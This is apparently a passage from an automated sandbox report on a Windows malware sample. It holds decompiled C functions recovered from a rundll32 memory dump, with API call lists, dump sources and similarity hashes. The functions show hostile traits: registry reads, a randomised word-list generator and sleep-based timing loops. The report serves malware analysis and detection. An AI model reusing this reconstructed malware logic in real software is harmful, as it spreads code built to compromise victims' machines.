                    						if(0 == 0) {
                    							_t36 = RtlAllocateHeap( *0x421a2d8, 0, 0x43);
                    							__eflags = _t36;
                    							 *0x421a364 = _t36;
                    							if(_t36 == 0) {
                    								_push(8);
                    								_pop(0);
                    							} else {
                    								_t56 =  *0x421a2fc; // 0x4000000a
                    								_t61 = _t56 & 0x000000ff;
                    								_t58 =  *0x421a320; // 0x87d5a8
                    								_t13 = _t58 + 0x421b55a; // 0x697a6f4d
                    								_t55 = _t13;
                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4219287);
                    							}
                    							__eflags = 0;
                    							_t54 = 0;
                    							if(0 == 0) {
                    								asm("sbb eax, eax");
                    								E042121BC( ~_v8 &  *0x421a310, 0x421a00c); // executed
                    								_t42 = E04214EF3(0, _t55, _t63, 0x421a00c); // executed
                    								_t54 = _t42;
                    								__eflags = _t54;
                    								if(_t54 != 0) {
                    									goto L30;
                    								}
                    								_t43 = E04213C10(); // executed
                    								__eflags = _t43;
                    								if(_t43 != 0) {
                    									__eflags = _v8;
                    									_t67 = _v12;
                    									if(_v8 != 0) {
                    										L29:
                    										_t44 = E04215458(_t61, _t67, _v8); // executed
                    										_t54 = _t44;
                    										goto L30;
                    									}
                    									__eflags = _t67;
                    									if(__eflags == 0) {
                    										goto L30;
                    									}
                    									_t54 = E04217576(__eflags,  &(_t67[4]));
                    									__eflags = _t54;
                    									if(_t54 == 0) {
                    										goto L30;
                    									}
                    									goto L29;
                    								}
                    								_t54 = 8;
                    							}
                    						}
                    					} else {
                    						_t68 = _v12;
                    						if(_t68 == 0) {
                    							L30:
                    							if(_v16 == 0 || _v16 == 1) {
                    								 *0x421a17c();
                    							}
                    							goto L34;
                    						}
                    						_t69 =  &(_t68[4]);
                    						do {
                    						} while (E042178DB(_t63, _t69, 0, 1) == 0x4c7);
                    					}
                    					goto L30;
                    				} else {
                    					_t54 = _t22;
                    					L34:
                    					return _t54;
                    				}
                    			}
































                    APIs
                      • Part of subcall function 04214843: GetModuleHandleA.KERNEL32(4C44544E,00000000,0421654D,00000001), ref: 04214852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 042165CA
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memset.NTDLL ref: 0421661A
                    • RtlInitializeCriticalSection.NTDLL(04A99570), ref: 0421662B
                      • Part of subcall function 04217576: memset.NTDLL ref: 04217590
                      • Part of subcall function 04217576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 042175D6
                      • Part of subcall function 04217576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 042175E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04216656
                    • wsprintfA.USER32 ref: 04216686
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: e38d91f9329b12ba5852ef9df733bd5c69781e808b5dd5e777dca712fa47b08a
                    • Instruction ID: 85aa34b7e4289ab9e1aec22d87ab8cf3a7d9e90adf2b6c8aff04aedbd699e063
                    • Opcode Fuzzy Hash: e38d91f9329b12ba5852ef9df733bd5c69781e808b5dd5e777dca712fa47b08a
                    • Instruction Fuzzy Hash: EC51B371B21216AFEB109FA8E848B6E77E8EB34744F104466E501E7170EAB9B944CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E042137CE(signed int __eax, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				intOrPtr _t81;
                    				char _t83;
                    				signed int _t90;
                    				signed int _t97;
                    				signed int _t99;
                    				char _t101;
                    				unsigned int _t102;
                    				intOrPtr _t103;
                    				char* _t107;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int _t118;
                    				signed int _t122;
                    				intOrPtr _t124;
                    
                    				_t102 = _a8;
                    				_t118 = 0;
                    				_v20 = __eax;
                    				_t122 = (_t102 >> 2) + 1;
                    				_v8 = 0;
                    				_a8 = 0;
                    				_t81 = E042163FD(_t122 << 2);
                    				_v16 = _t81;
                    				if(_t81 == 0) {
                    					_push(8);
                    					_pop(0);
                    					L37:
                    					return 0;
                    				}
                    				_t107 = _a4;
                    				_a4 = _t102;
                    				_t113 = 0;
                    				while(1) {
                    					_t83 =  *_t107;
                    					if(_t83 == 0) {
                    						break;
                    					}
                    					if(_t83 == 0xd || _t83 == 0xa) {
                    						if(_t118 != 0) {
                    							if(_t118 > _v8) {
                    								_v8 = _t118;
                    							}
                    							_a8 = _a8 + 1;
                    							_t118 = 0;
                    						}
                    						 *_t107 = 0;
                    						goto L16;
                    					} else {
                    						if(_t118 != 0) {
                    							L10:
                    							_t118 = _t118 + 1;
                    							L16:
                    							_t107 = _t107 + 1;
                    							_t15 =  &_a4;
                    							 *_t15 = _a4 - 1;
                    							if( *_t15 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						if(_t113 == _t122) {
                    							L21:
                    							if(_a8 <= 0x20) {
                    								_push(0xb);
                    								L34:
                    								_pop(0);
                    								L35:
                    								E042117AB(_v16);
                    								goto L37;
                    							}
                    							_t24 = _v8 + 5; // 0xcdd8d2f8
                    							_t103 = E042163FD((_v8 + _t24) * _a8 + 4);
                    							if(_t103 == 0) {
                    								_push(8);
                    								goto L34;
                    							}
                    							_t90 = _a8;
                    							_a4 = _a4 & 0x00000000;
                    							_v8 = _v8 & 0x00000000;
                    							_t124 = _t103 + _t90 * 4;
                    							if(_t90 <= 0) {
                    								L31:
                    								 *0x421a318 = _t103;
                    								goto L35;
                    							}
                    							do {
                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                    								_v12 = _v12 & 0x00000000;
                    								if(_a4 <= 0) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t99 = _v12;
                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                    									if(_t99 == 0) {
                    										break;
                    									}
                    									_v12 = _v12 + 1;
                    									if(_v12 < _a4) {
                    										continue;
                    									}
                    									goto L30;
                    								}
                    								_v8 = _v8 - 1;
                    								L30:
                    								_t97 = _a4;
                    								_a4 = _a4 + 1;
                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                    								__imp__(_t124);
                    								_v8 = _v8 + 1;
                    								_t124 = _t124 + _t97 + 1;
                    							} while (_v8 < _a8);
                    							goto L31;
                    						}
                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                    						_t101 = _t83;
                    						if(_t83 - 0x61 <= 0x19) {
                    							_t101 = _t101 - 0x20;
                    						}
                    						 *_t107 = _t101;
                    						_t113 = _t113 + 1;
                    						goto L10;
                    					}
                    				}
                    				if(_t118 != 0) {
                    					if(_t118 > _v8) {
                    						_v8 = _t118;
                    					}
                    					_a8 = _a8 + 1;
                    				}
                    				goto L21;
                    			}






















                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 042138CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 042138E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 042138F7
                    • lstrlen.KERNEL32(69B25F45), ref: 0421391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: b35b3d4a55ae9c5e1b100840f3f3bea85a6ec566d6b972570642e5667cd0a54b
                    • Instruction ID: 486de237412c67d20a4d7befe3acdd115d89b5911362631300f53d4536c842dd
                    • Opcode Fuzzy Hash: b35b3d4a55ae9c5e1b100840f3f3bea85a6ec566d6b972570642e5667cd0a54b
                    • Instruction Fuzzy Hash: 4851AC71B10209EFEF21CF99C4846ADBBF6FF65314F05805AEC59AB221C770AA51CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04213399(void* __edx) {
                    				void* _v8;
                    				int _v12;
                    				WCHAR* _v16;
                    				void* __edi;
                    				void* __esi;
                    				void* _t23;
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t38;
                    				void* _t40;
                    				intOrPtr _t42;
                    				void* _t45;
                    				void* _t50;
                    				void* _t52;
                    
                    				_t50 = __edx;
                    				_v12 = 0;
                    				_t23 = E042140C7(0,  &_v8); // executed
                    				if(_t23 != 0) {
                    					_v8 = 0;
                    				}
                    				_t24 =  *0x421a320; // 0x87d5a8
                    				_t4 = _t24 + 0x421be30; // 0x4a993d8
                    				_t5 = _t24 + 0x421bdd8; // 0x4f0053
                    				_t26 = E04212985( &_v16, _v8, _t5, _t4); // executed
                    				_t45 = _t26;
                    				if(_t45 == 0) {
                    					StrToIntExW(_v16, 0,  &_v12);
                    					_t45 = 8;
                    					if(_v12 < _t45) {
                    						_t45 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t32 =  *0x421a320; // 0x87d5a8
                    						_t11 = _t32 + 0x421be24; // 0x4a993cc
                    						_t48 = _t11;
                    						_t12 = _t32 + 0x421bdd8; // 0x4f0053
                    						_t52 = E0421114D(_t11, _t12, _t11);
                    						_t59 = _t52;
                    						if(_t52 != 0) {
                    							_t35 =  *0x421a320; // 0x87d5a8
                    							_t13 = _t35 + 0x421be6e; // 0x30314549
                    							if(E04215231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                    								_t61 =  *0x421a2fc - 6;
                    								if( *0x421a2fc <= 6) {
                    									_t42 =  *0x421a320; // 0x87d5a8
                    									_t15 = _t42 + 0x421bdba; // 0x52384549
                    									E04215231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                    								}
                    							}
                    							_t38 =  *0x421a320; // 0x87d5a8
                    							_t17 = _t38 + 0x421be68; // 0x4a99410
                    							_t18 = _t38 + 0x421be40; // 0x680043
                    							_t40 = E042134EE(_v8, 0x80000001, _t52, _t18, _t17); // executed
                    							_t45 = _t40;
                    							HeapFree( *0x421a2d8, 0, _t52);
                    						}
                    					}
                    					HeapFree( *0x421a2d8, 0, _v16);
                    				}
                    				_t54 = _v8;
                    				if(_v8 != 0) {
                    					E04214B59(_t54);
                    				}
                    				return _t45;
                    			}




















                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04A993D8,00000000,?,74E5F710,00000000,74E5F730), ref: 042133E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04A99410,?,00000000,30314549,00000014,004F0053,04A993CC), ref: 04213485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,042154F9), ref: 04213497
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 9a11d9407899306e4748e71a272d9772625bebf1dead96f9ebde39a21149fd90
                    • Instruction ID: 1e2c2ed15e04fe5acd3e442333f337082b5191b2a74e05800420ba961fbbce0b
                    • Opcode Fuzzy Hash: 9a11d9407899306e4748e71a272d9772625bebf1dead96f9ebde39a21149fd90
                    • Instruction Fuzzy Hash: 01318431B10149BFEB12DBD4EC84E9ABBF9EB29754F5400A6E504A7071DA71AE04D750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 0421153B
                    • SysAllocString.OLEAUT32(04212BCC), ref: 0421157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04211592
                    • SysFreeString.OLEAUT32(00000000), ref: 042115A0
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: ca1e2b3ef8a8a5fc9c82f07acbd97d77c6645cb46ea228308ff515dd48dc0d59
                    • Instruction ID: 4a83b9150b516b5b7c8855713e97ca950b08317afee1e1085b412c3d1e156503
                    • Opcode Fuzzy Hash: ca1e2b3ef8a8a5fc9c82f07acbd97d77c6645cb46ea228308ff515dd48dc0d59
                    • Instruction Fuzzy Hash: B331DD71A10109FF8B05DF98D4848AEBBF5FF6C380B10442EF50797260E775AA55CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E042157A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                    				intOrPtr _v8;
                    				void* _v12;
                    				void* _v16;
                    				intOrPtr _t26;
                    				intOrPtr* _t28;
                    				intOrPtr _t31;
                    				intOrPtr* _t32;
                    				void* _t39;
                    				int _t46;
                    				intOrPtr* _t47;
                    				int _t48;
                    
                    				_t47 = __eax;
                    				_push( &_v12);
                    				_push(__eax);
                    				_t39 = 0;
                    				_t46 = 0; // executed
                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                    				_v8 = _t26;
                    				if(_t26 < 0) {
                    					L13:
                    					return _v8;
                    				}
                    				if(_v12 == 0) {
                    					Sleep(0xc8);
                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                    				}
                    				if(_v8 >= _t39) {
                    					_t28 = _v12;
                    					if(_t28 != 0) {
                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                    						_v8 = _t31;
                    						if(_t31 >= 0) {
                    							_t46 = lstrlenW(_v16);
                    							if(_t46 != 0) {
                    								_t46 = _t46 + 1;
                    								_t48 = _t46 + _t46;
                    								_t39 = E042163FD(_t48);
                    								if(_t39 == 0) {
                    									_v8 = 0x8007000e;
                    								} else {
                    									memcpy(_t39, _v16, _t48);
                    								}
                    								__imp__#6(_v16);
                    							}
                    						}
                    						_t32 = _v12;
                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                    					}
                    					 *_a4 = _t39;
                    					 *_a8 = _t46 + _t46;
                    				}
                    				goto L13;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: c2cffa2a6d6813fb994dfd82faa101c4486dcf93f0c37c04d46696fa9c4158e1
                    • Instruction ID: eb19dbe6d08f905e05dc10d6cdb5efa66a783ee8d724c557174d53cb92ee7fee
                    • Opcode Fuzzy Hash: c2cffa2a6d6813fb994dfd82faa101c4486dcf93f0c37c04d46696fa9c4158e1
                    • Instruction Fuzzy Hash: 25215175A10209FFCB11DFA8D88899EBBF4FF98300B1145A9E815D7220E730EA81CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E04212A4C(void* __ecx, intOrPtr _a4) {
                    				struct _FILETIME _v12;
                    				int _t13;
                    				signed int _t16;
                    				void* _t18;
                    				signed int _t19;
                    				unsigned int _t23;
                    				void* _t30;
                    				signed int _t34;
                    
                    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                    				asm("stosd");
                    				do {
                    					_t13 = SwitchToThread();
                    					GetSystemTimeAsFileTime( &_v12);
                    					_t23 = _v12.dwHighDateTime;
                    					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                    					_push(0);
                    					_push(0x13);
                    					_push(_t23 >> 5);
                    					_push(_t16);
                    					L042182E6();
                    					_t34 = _t16 + _t13;
                    					_t18 = E04212888(_a4, _t34);
                    					_t30 = _t18;
                    					_t19 = 3;
                    					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                    				} while (_t30 == 1);
                    				return _t30;
                    			}

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04214610,?,?), ref: 04212A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04214610,?,?), ref: 04212A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04212A82
                      • Part of subcall function 04212888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 042128E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04214610,?,?), ref: 04212AA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: 9b0212c9c4d77db581864407ad1babf86a49b460f4e2d1af84c6f052aa6dee26
                    • Instruction ID: 31d7eb9156dba9b92ba7d8d465429413baf7c5456c50e1fd4ebe7604918c20de
                    • Opcode Fuzzy Hash: 9b0212c9c4d77db581864407ad1babf86a49b460f4e2d1af84c6f052aa6dee26
                    • Instruction Fuzzy Hash: 52F0A4B3B50104BBD7149AA8DC5DBAF76F9DB94355F110164F601E7240E978AA40C6A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 47%
                    			E04213B61(char* _a4, char** _a8) {
                    				char* _t7;
                    				char* _t11;
                    				char* _t14;
                    				char* _t16;
                    				char* _t17;
                    				char _t18;
                    				signed int _t20;
                    				signed int _t22;
                    
                    				_t16 = _a4;
                    				_push(0x20);
                    				_t20 = 1;
                    				_push(_t16);
                    				while(1) {
                    					_t7 = StrChrA();
                    					if(_t7 == 0) {
                    						break;
                    					}
                    					_t20 = _t20 + 1;
                    					_push(0x20);
                    					_push( &(_t7[1]));
                    				}
                    				_t11 = E042163FD(_t20 << 2);
                    				_a4 = _t11;
                    				if(_t11 != 0) {
                    					StrTrimA(_t16, 0x4219284); // executed
                    					_t22 = 0;
                    					do {
                    						_t14 = StrChrA(_t16, 0x20);
                    						if(_t14 != 0) {
                    							 *_t14 = 0;
                    							do {
                    								_t14 =  &(_t14[1]);
                    								_t18 =  *_t14;
                    							} while (_t18 == 0x20 || _t18 == 9);
                    						}
                    						_t17 = _a4;
                    						 *(_t17 + _t22 * 4) = _t16;
                    						_t22 = _t22 + 1;
                    						_t16 = _t14;
                    					} while (_t14 != 0);
                    					 *_a8 = _t17;
                    				}
                    				return 0;
                    			}

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,04A995AC,?,?,0421104B,?,04A995AC), ref: 04213B7D
                    • StrTrimA.SHLWAPI(?,04219284,00000002,?,0421104B,?,04A995AC), ref: 04213B9B
                    • StrChrA.SHLWAPI(?,00000020,?,0421104B,?,04A995AC), ref: 04213BA6
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: b71f49405635a36140a71bf6097f875b5fe8d528e4275cf839839af7fd27c99b
                    • Instruction ID: 12517c329367d6c957f26faa4c333a789e12c0bc70549386b20b8cf35091e70d
                    • Opcode Fuzzy Hash: b71f49405635a36140a71bf6097f875b5fe8d528e4275cf839839af7fd27c99b
                    • Instruction Fuzzy Hash: 9A0171723203466FF7109E2A9C49F677BDEEBE9794F044021ED55CB2A1E970E942C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0421607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				int _v12;
                    				signed int _v16;
                    				void* _v20;
                    				signed char _v36;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t35;
                    				signed char* _t46;
                    				int _t53;
                    				void* _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t46 = _a4;
                    				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                    				_v12 = 0x110;
                    				_t24 = E042163FD(_t53);
                    				_a4 = _t24;
                    				if(_t24 != 0) {
                    					memcpy(_t24,  *0x421a374, 0x110);
                    					_t27 =  *0x421a378; // 0x0
                    					_t57 = _t56 + 0xc;
                    					if(_t27 != 0) {
                    						_t51 = _a4;
                    						E042143A6(0x110, _a4, _t27, 0);
                    					}
                    					if(E04215B65( &_v36) != 0) {
                    						_t35 = E04214872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                    						if(_t35 == 0) {
                    							_t55 = _v20;
                    							_v36 =  *_t46;
                    							_v16 = E04216412(_t55, _a8, _t51, _t46, _a12);
                    							 *(_t55 + 4) = _v36;
                    							_t20 =  &(_t46[4]); // 0xbf0845c7
                    							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                    							_t57 = _t57 + 0xc;
                    							E042117AB(_t55);
                    						}
                    					}
                    					memset(_a4, 0, _t53);
                    					E042117AB(_a4);
                    				}
                    				return _v16;
                    			}

                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04214DD9,?,04213AC6,04213AC6,?), ref: 042160B3
                    • memset.NTDLL ref: 04216128
                    • memset.NTDLL ref: 0421613C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: baff9c27c146b1d785509e1ecd79425b77034abdc862cd0fffc5876b0bbf6bd9
                    • Instruction ID: 2ef289f42f21f1f7c88966a285e96627d65472d5f42b2a16f8aaf911988d9c4e
                    • Opcode Fuzzy Hash: baff9c27c146b1d785509e1ecd79425b77034abdc862cd0fffc5876b0bbf6bd9
                    • Instruction Fuzzy Hash: FE213D75B10128ABEF11EF65DC40FAEBBF8AF58644F044065F905E7261D734EA518BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04215F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                    				void* _v8;
                    				void* __esi;
                    				intOrPtr* _t35;
                    				void* _t40;
                    				intOrPtr* _t41;
                    				intOrPtr* _t43;
                    				intOrPtr* _t45;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				void* _t54;
                    				intOrPtr* _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t61;
                    				intOrPtr* _t65;
                    				intOrPtr _t68;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    
                    				_t55 = _a4;
                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                    				_a4 = 0;
                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                    				if(_t76 < 0) {
                    					L18:
                    					return _t76;
                    				}
                    				_t40 = E042114E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                    				_t76 = _t40;
                    				if(_t76 >= 0) {
                    					_t61 = _a28;
                    					if(_t61 != 0 &&  *_t61 != 0) {
                    						_t52 = _v8;
                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                    					}
                    					if(_t76 >= 0) {
                    						_t43 =  *_t55;
                    						_t68 =  *0x421a320; // 0x87d5a8
                    						_t20 = _t68 + 0x421b1fc; // 0x740053
                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                    						if(_t76 >= 0) {
                    							_t76 = E042163B0(_a4);
                    							if(_t76 >= 0) {
                    								_t65 = _a28;
                    								if(_t65 != 0 &&  *_t65 == 0) {
                    									_t50 = _a4;
                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                    								}
                    							}
                    						}
                    						_t45 = _a4;
                    						if(_t45 != 0) {
                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                    						}
                    						_t57 = __imp__#6;
                    						if(_a20 != 0) {
                    							 *_t57(_a20);
                    						}
                    						if(_a12 != 0) {
                    							 *_t57(_a12);
                    						}
                    					}
                    				}
                    				_t41 = _v8;
                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                    				goto L18;
                    			}

                    APIs
                      • Part of subcall function 042114E4: SysAllocString.OLEAUT32(80000002), ref: 0421153B
                      • Part of subcall function 042114E4: SysFreeString.OLEAUT32(00000000), ref: 042115A0
                    • SysFreeString.OLEAUT32(?), ref: 0421605F
                    • SysFreeString.OLEAUT32(04212BCC), ref: 04216069
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 4f947bb13e89e9cba356307a266d220631b8a3c1834ede00f5138fca1431b9d6
                    • Instruction ID: ec823654e061f99e0d73517ca4beadf18685d68096ab1a0cc3860610580a8f33
                    • Opcode Fuzzy Hash: 4f947bb13e89e9cba356307a266d220631b8a3c1834ede00f5138fca1431b9d6
                    • Instruction Fuzzy Hash: EA311772600159EFCB21DF58C888C9FBBB9FBD97407154658F9059B220D732ED91CBA0
